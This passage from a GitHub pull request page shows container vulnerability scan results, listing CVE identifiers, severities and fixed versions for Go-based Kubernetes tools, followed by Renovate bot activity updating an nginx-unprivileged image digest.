stdlib CVE-2024-34156 HIGH v1.23.0 1.22.7, 1.23.1
stdlib CVE-2025-47907 HIGH v1.23.0 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.23.0 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.23.0 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.23.0 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.23.0 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.23.0 1.24.12, 1.25.6
stdlib CVE-2024-34155 MEDIUM v1.23.0 1.22.7, 1.23.1
stdlib CVE-2024-34158 MEDIUM v1.23.0 1.22.7, 1.23.1
stdlib CVE-2024-45336 MEDIUM v1.23.0 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2024-45341 MEDIUM v1.23.0 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2025-0913 MEDIUM v1.23.0 1.23.10, 1.24.4
stdlib CVE-2025-22866 MEDIUM v1.23.0 1.22.12, 1.23.6, 1.24.0-rc.3
stdlib CVE-2025-22871 MEDIUM v1.23.0 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.23.0 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.23.0 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.23.0 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.23.0 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.23.0 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.23.0 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.23.0 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.23.0 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.23.0 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.23.0 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.23.0 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.23.0 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.23.0 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/kubepug

45 known vulnerabilities found (MEDIUM: 33 LOW: 0 CRITICAL: 2 HIGH: 10)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
golang.org/x/net CVE-2023-45288 MEDIUM v0.17.0 0.23.0
golang.org/x/net CVE-2025-22870 MEDIUM v0.17.0 0.36.0
golang.org/x/net CVE-2025-22872 MEDIUM v0.17.0 0.38.0
golang.org/x/oauth2 CVE-2025-22868 HIGH v0.8.0 0.27.0
google.golang.org/protobuf CVE-2024-24786 MEDIUM v1.30.0 1.33.0
stdlib CVE-2024-24790 CRITICAL v1.21.3 1.21.11, 1.22.4
stdlib CVE-2025-68121 CRITICAL v1.21.3 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2023-45283 HIGH v1.21.3 1.20.11, 1.21.4, 1.20.12, 1.21.5
stdlib CVE-2023-45288 HIGH v1.21.3 1.21.9, 1.22.2
stdlib CVE-2024-34156 HIGH v1.21.3 1.22.7, 1.23.1
stdlib CVE-2025-47907 HIGH v1.21.3 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.21.3 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.21.3 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.21.3 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.21.3 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.21.3 1.24.12, 1.25.6
stdlib CVE-2023-39326 MEDIUM v1.21.3 1.20.12, 1.21.5
stdlib CVE-2023-45284 MEDIUM v1.21.3 1.20.11, 1.21.4
stdlib CVE-2023-45289 MEDIUM v1.21.3 1.21.8, 1.22.1
stdlib CVE-2023-45290 MEDIUM v1.21.3 1.21.8, 1.22.1
stdlib CVE-2024-24783 MEDIUM v1.21.3 1.21.8, 1.22.1
stdlib CVE-2024-24784 MEDIUM v1.21.3 1.21.8, 1.22.1
stdlib CVE-2024-24785 MEDIUM v1.21.3 1.21.8, 1.22.1
stdlib CVE-2024-24789 MEDIUM v1.21.3 1.21.11, 1.22.4
stdlib CVE-2024-24791 MEDIUM v1.21.3 1.21.12, 1.22.5
stdlib CVE-2024-34155 MEDIUM v1.21.3 1.22.7, 1.23.1
stdlib CVE-2024-34158 MEDIUM v1.21.3 1.22.7, 1.23.1
stdlib CVE-2024-45336 MEDIUM v1.21.3 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2024-45341 MEDIUM v1.21.3 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2025-0913 MEDIUM v1.21.3 1.23.10, 1.24.4
stdlib CVE-2025-22866 MEDIUM v1.21.3 1.22.12, 1.23.6, 1.24.0-rc.3
stdlib CVE-2025-22871 MEDIUM v1.21.3 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.21.3 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.21.3 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.21.3 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.21.3 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.21.3 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.21.3 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.21.3 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.21.3 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.21.3 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.21.3 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.21.3 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.21.3 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.21.3 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/kubescape

2 known vulnerabilities found (HIGH: 1 MEDIUM: 0 LOW: 1 CRITICAL: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
github.com/anchore/grype CVE-2025-65965 HIGH v0.99.1 0.104.1
github.com/cloudflare/circl CVE-2026-1229 LOW v1.6.1 1.6.3

No Misconfigurations found

usr/local/bin/kubesec

29 known vulnerabilities found (LOW: 0 CRITICAL: 2 HIGH: 7 MEDIUM: 20)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
golang.org/x/crypto CVE-2024-45337 CRITICAL v0.29.0 0.31.0
golang.org/x/crypto CVE-2025-22869 HIGH v0.29.0 0.35.0
golang.org/x/crypto CVE-2025-47914 MEDIUM v0.29.0 0.45.0
golang.org/x/crypto CVE-2025-58181 MEDIUM v0.29.0 0.45.0
stdlib CVE-2025-68121 CRITICAL v1.23.1 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-47907 HIGH v1.23.1 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.23.1 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.23.1 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.23.1 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.23.1 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.23.1 1.24.12, 1.25.6
stdlib CVE-2024-45336 MEDIUM v1.23.1 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2024-45341 MEDIUM v1.23.1 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2025-0913 MEDIUM v1.23.1 1.23.10, 1.24.4
stdlib CVE-2025-22866 MEDIUM v1.23.1 1.22.12, 1.23.6, 1.24.0-rc.3
stdlib CVE-2025-22871 MEDIUM v1.23.1 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.23.1 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.23.1 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.23.1 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.23.1 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.23.1 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.23.1 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.23.1 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.23.1 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.23.1 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.23.1 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.23.1 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.23.1 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.23.1 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/kubeval

102 known vulnerabilities found (HIGH: 50 MEDIUM: 46 LOW: 1 CRITICAL: 5)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
golang.org/x/sys CVE-2022-29526 MEDIUM v0.0.0-20200223170610-d5e6a3e2c0ae 0.0.0-20220412211240-33da011f77ad
golang.org/x/text CVE-2021-38561 HIGH v0.3.2 0.3.7
golang.org/x/text CVE-2022-32149 HIGH v0.3.2 0.3.8
golang.org/x/text CVE-2020-14040 MEDIUM v0.3.2 0.3.3
stdlib CVE-2022-23806 CRITICAL v1.16.2 1.16.14, 1.17.7
stdlib CVE-2023-24538 CRITICAL v1.16.2 1.19.8, 1.20.3
stdlib CVE-2023-24540 CRITICAL v1.16.2 1.19.9, 1.20.4
stdlib CVE-2024-24790 CRITICAL v1.16.2 1.21.11, 1.22.4
stdlib CVE-2025-68121 CRITICAL v1.16.2 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2021-33195 HIGH v1.16.2 1.15.13, 1.16.5
stdlib CVE-2021-33196 HIGH v1.16.2 1.15.13, 1.16.5
stdlib CVE-2021-33198 HIGH v1.16.2 1.15.13, 1.16.5
stdlib CVE-2021-39293 HIGH v1.16.2 1.16.8, 1.17.1
stdlib CVE-2021-41771 HIGH v1.16.2 1.16.10, 1.17.3
stdlib CVE-2021-41772 HIGH v1.16.2 1.16.10, 1.17.3
stdlib CVE-2021-44716 HIGH v1.16.2 1.16.12, 1.17.5
stdlib CVE-2022-23772 HIGH v1.16.2 1.16.14, 1.17.7
stdlib CVE-2022-24675 HIGH v1.16.2 1.17.9, 1.18.1
stdlib CVE-2022-24921 HIGH v1.16.2 1.16.15, 1.17.8
stdlib CVE-2022-27664 HIGH v1.16.2 1.18.6, 1.19.1
stdlib CVE-2022-28131 HIGH v1.16.2 1.17.12, 1.18.4
stdlib CVE-2022-28327 HIGH v1.16.2 1.17.9, 1.18.1
stdlib CVE-2022-2879 HIGH v1.16.2 1.18.7, 1.19.2
stdlib CVE-2022-2880 HIGH v1.16.2 1.18.7, 1.19.2
stdlib CVE-2022-29804 HIGH v1.16.2 1.17.11, 1.18.3
stdlib CVE-2022-30580 HIGH v1.16.2 1.17.11, 1.18.3
stdlib CVE-2022-30630 HIGH v1.16.2 1.17.12, 1.18.4
stdlib CVE-2022-30631 HIGH v1.16.2 1.17.12, 1.18.4
stdlib CVE-2022-30632 HIGH v1.16.2 1.17.12, 1.18.4
stdlib CVE-2022-30633 HIGH v1.16.2 1.17.12, 1.18.4
stdlib CVE-2022-30634 HIGH v1.16.2 1.17.11, 1.18.3
stdlib CVE-2022-30635 HIGH v1.16.2 1.17.12, 1.18.4
stdlib CVE-2022-32189 HIGH v1.16.2 1.17.13, 1.18.5
stdlib CVE-2022-41715 HIGH v1.16.2 1.18.7, 1.19.2
stdlib CVE-2022-41716 HIGH v1.16.2 1.18.8, 1.19.3
stdlib CVE-2022-41720 HIGH v1.16.2 1.18.9, 1.19.4
stdlib CVE-2022-41722 HIGH v1.16.2 1.19.6, 1.20.1
stdlib CVE-2022-41723 HIGH v1.16.2 1.19.6, 1.20.1
stdlib CVE-2022-41724 HIGH v1.16.2 1.19.6, 1.20.1
stdlib CVE-2022-41725 HIGH v1.16.2 1.19.6, 1.20.1
stdlib CVE-2023-24534 HIGH v1.16.2 1.19.8, 1.20.3
stdlib CVE-2023-24536 HIGH v1.16.2 1.19.8, 1.20.3
stdlib CVE-2023-24537 HIGH v1.16.2 1.19.8, 1.20.3
stdlib CVE-2023-24539 HIGH v1.16.2 1.19.9, 1.20.4
stdlib CVE-2023-29400 HIGH v1.16.2 1.19.9, 1.20.4
stdlib CVE-2023-29403 HIGH v1.16.2 1.19.10, 1.20.5
stdlib CVE-2023-39325 HIGH v1.16.2 1.20.10, 1.21.3
stdlib CVE-2023-45283 HIGH v1.16.2 1.20.11, 1.21.4, 1.20.12, 1.21.5
stdlib CVE-2023-45287 HIGH v1.16.2 1.20.0
stdlib CVE-2023-45288 HIGH v1.16.2 1.21.9, 1.22.2
stdlib CVE-2024-34156 HIGH v1.16.2 1.22.7, 1.23.1
stdlib CVE-2025-47907 HIGH v1.16.2 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.16.2 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.16.2 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.16.2 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.16.2 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.16.2 1.24.12, 1.25.6
stdlib CVE-2021-31525 MEDIUM v1.16.2 1.15.12, 1.16.4
stdlib CVE-2021-33197 MEDIUM v1.16.2 1.15.13, 1.16.5
stdlib CVE-2021-34558 MEDIUM v1.16.2 1.15.14, 1.16.6
stdlib CVE-2021-36221 MEDIUM v1.16.2 1.15.15, 1.16.7
stdlib CVE-2021-44717 MEDIUM v1.16.2 1.16.12, 1.17.5
stdlib CVE-2022-1705 MEDIUM v1.16.2 1.17.12, 1.18.4
stdlib CVE-2022-1962 MEDIUM v1.16.2 1.17.12, 1.18.4
stdlib CVE-2022-29526 MEDIUM v1.16.2 1.17.10, 1.18.2
stdlib CVE-2022-32148 MEDIUM v1.16.2 1.17.12, 1.18.4
stdlib CVE-2022-41717 MEDIUM v1.16.2 1.18.9, 1.19.4
stdlib CVE-2023-24532 MEDIUM v1.16.2 1.19.7, 1.20.2
stdlib CVE-2023-29406 MEDIUM v1.16.2 1.19.11, 1.20.6
stdlib CVE-2023-29409 MEDIUM v1.16.2 1.19.12, 1.20.7, 1.21.0-rc.4
stdlib CVE-2023-39318 MEDIUM v1.16.2 1.20.8, 1.21.1
stdlib CVE-2023-39319 MEDIUM v1.16.2 1.20.8, 1.21.1
stdlib CVE-2023-39326 MEDIUM v1.16.2 1.20.12, 1.21.5
stdlib CVE-2023-45284 MEDIUM v1.16.2 1.20.11, 1.21.4
stdlib CVE-2023-45289 MEDIUM v1.16.2 1.21.8, 1.22.1
stdlib CVE-2023-45290 MEDIUM v1.16.2 1.21.8, 1.22.1
stdlib CVE-2024-24783 MEDIUM v1.16.2 1.21.8, 1.22.1
stdlib CVE-2024-24784 MEDIUM v1.16.2 1.21.8, 1.22.1
stdlib CVE-2024-24785 MEDIUM v1.16.2 1.21.8, 1.22.1
stdlib CVE-2024-24789 MEDIUM v1.16.2 1.21.11, 1.22.4
stdlib CVE-2024-24791 MEDIUM v1.16.2 1.21.12, 1.22.5
stdlib CVE-2024-34155 MEDIUM v1.16.2 1.22.7, 1.23.1
stdlib CVE-2024-34158 MEDIUM v1.16.2 1.22.7, 1.23.1
stdlib CVE-2024-45336 MEDIUM v1.16.2 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2024-45341 MEDIUM v1.16.2 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2025-0913 MEDIUM v1.16.2 1.23.10, 1.24.4
stdlib CVE-2025-22866 MEDIUM v1.16.2 1.22.12, 1.23.6, 1.24.0-rc.3
stdlib CVE-2025-22871 MEDIUM v1.16.2 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.16.2 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.16.2 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.16.2 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.16.2 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.16.2 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.16.2 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.16.2 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.16.2 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.16.2 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.16.2 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.16.2 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.16.2 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.16.2 1.24.11, 1.25.5
stdlib CVE-2022-30629 LOW v1.16.2 1.17.11, 1.18.3

No Misconfigurations found

usr/local/bin/kustomize

23 known vulnerabilities found (CRITICAL: 1 HIGH: 7 MEDIUM: 15 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.24.0 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-22874 HIGH v1.24.0 1.24.4
stdlib CVE-2025-47907 HIGH v1.24.0 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.24.0 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.24.0 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.24.0 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.24.0 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.24.0 1.24.12, 1.25.6
stdlib CVE-2025-0913 MEDIUM v1.24.0 1.23.10, 1.24.4
stdlib CVE-2025-22871 MEDIUM v1.24.0 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.24.0 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.24.0 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.24.0 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.24.0 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.24.0 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.24.0 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.24.0 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.24.0 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.24.0 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.24.0 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.24.0 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.24.0 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.24.0 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/kyverno

3 known vulnerabilities found (LOW: 1 CRITICAL: 1 HIGH: 0 MEDIUM: 1)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
github.com/cloudflare/circl CVE-2026-1229 LOW v1.6.1 1.6.3
github.com/go-git/go-git/v5 CVE-2026-25934 MEDIUM v5.16.4 5.16.5
stdlib CVE-2025-68121 CRITICAL v1.25.6 1.24.13, 1.25.7, 1.26.0-rc.3

No Misconfigurations found

usr/local/bin/nova

4 known vulnerabilities found (LOW: 0 CRITICAL: 1 HIGH: 3 MEDIUM: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.25.5 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61730 HIGH v1.25.5 1.24.12, 1.25.6

No Misconfigurations found

usr/local/bin/pluto

4 known vulnerabilities found (CRITICAL: 1 HIGH: 3 MEDIUM: 0 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.25.5 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61730 HIGH v1.25.5 1.24.12, 1.25.6

No Misconfigurations found

usr/local/bin/polaris

4 known vulnerabilities found (CRITICAL: 1 HIGH: 3 MEDIUM: 0 LOW: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.25.5 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-61726 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.25.5 1.24.12, 1.25.6
stdlib CVE-2025-61730 HIGH v1.25.5 1.24.12, 1.25.6

No Misconfigurations found

usr/local/bin/s5cmd

25 known vulnerabilities found (HIGH: 6 MEDIUM: 18 LOW: 0 CRITICAL: 1)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
stdlib CVE-2025-68121 CRITICAL v1.22.10 1.24.13, 1.25.7, 1.26.0-rc.3
stdlib CVE-2025-47907 HIGH v1.22.10 1.23.12, 1.24.6
stdlib CVE-2025-58183 HIGH v1.22.10 1.24.8, 1.25.2
stdlib CVE-2025-61726 HIGH v1.22.10 1.24.12, 1.25.6
stdlib CVE-2025-61728 HIGH v1.22.10 1.24.12, 1.25.6
stdlib CVE-2025-61729 HIGH v1.22.10 1.24.11, 1.25.5
stdlib CVE-2025-61730 HIGH v1.22.10 1.24.12, 1.25.6
stdlib CVE-2024-45336 MEDIUM v1.22.10 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2024-45341 MEDIUM v1.22.10 1.22.11, 1.23.5, 1.24.0-rc.2
stdlib CVE-2025-0913 MEDIUM v1.22.10 1.23.10, 1.24.4
stdlib CVE-2025-22866 MEDIUM v1.22.10 1.22.12, 1.23.6, 1.24.0-rc.3
stdlib CVE-2025-22871 MEDIUM v1.22.10 1.23.8, 1.24.2
stdlib CVE-2025-22873 MEDIUM v1.22.10 1.23.9, 1.24.3
stdlib CVE-2025-4673 MEDIUM v1.22.10 1.23.10, 1.24.4
stdlib CVE-2025-47906 MEDIUM v1.22.10 1.23.12, 1.24.6
stdlib CVE-2025-47912 MEDIUM v1.22.10 1.24.8, 1.25.2
stdlib CVE-2025-58185 MEDIUM v1.22.10 1.24.8, 1.25.2
stdlib CVE-2025-58186 MEDIUM v1.22.10 1.24.8, 1.25.2
stdlib CVE-2025-58187 MEDIUM v1.22.10 1.24.9, 1.25.3
stdlib CVE-2025-58188 MEDIUM v1.22.10 1.24.8, 1.25.2
stdlib CVE-2025-58189 MEDIUM v1.22.10 1.24.8, 1.25.2
stdlib CVE-2025-61723 MEDIUM v1.22.10 1.24.8, 1.25.2
stdlib CVE-2025-61724 MEDIUM v1.22.10 1.24.8, 1.25.2
stdlib CVE-2025-61725 MEDIUM v1.22.10 1.24.8, 1.25.2
stdlib CVE-2025-61727 MEDIUM v1.22.10 1.24.11, 1.25.5

No Misconfigurations found

usr/local/bin/trivy

2 known vulnerabilities found (MEDIUM: 1 LOW: 1 CRITICAL: 0 HIGH: 0)

Show detailed table of vulnerabilities
Package ID Severity Installed Version Fixed Version
github.com/cloudflare/circl CVE-2026-1229 LOW v1.6.1 1.6.3
github.com/go-git/go-git/v5 CVE-2026-25934 MEDIUM v5.16.4 5.16.5

No Misconfigurations found

usr/local/bin/yq

No Vulnerabilities found

No Misconfigurations found

@renovate renovate bot force-pushed the renovate/docker.io-nginxinc-nginx-unprivileged-1.29.5 branch from df59a6b to fb248f8 Compare March 1, 2026 10:07
@renovate renovate bot changed the title chore(deps): update docker.io/nginxinc/nginx-unprivileged:1.29.5 docker digest to 0ac6770 chore(deps): update docker.io/nginxinc/nginx-unprivileged:1.29.5 docker digest to e080d97 Mar 2, 2026
@renovate renovate bot force-pushed the renovate/docker.io-nginxinc-nginx-unprivileged-1.29.5 branch from fb248f8 to 23d6e3c Compare March 2, 2026 09:44
renovate-approve-2[bot]
renovate-approve-2 bot previously approved these changes Mar 2, 2026
renovate-approve[bot]
renovate-approve bot previously approved these changes Mar 2, 2026
@renovate renovate bot changed the title chore(deps): update docker.io/nginxinc/nginx-unprivileged:1.29.5 docker digest to e080d97 chore(deps): update docker.io/nginxinc/nginx-unprivileged:1.29.5 docker digest to 204990d Mar 9, 2026
@renovate renovate bot force-pushed the renovate/docker.io-nginxinc-nginx-unprivileged-1.29.5 branch from 23d6e3c to d228bc3 Compare March 9, 2026 05:13
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants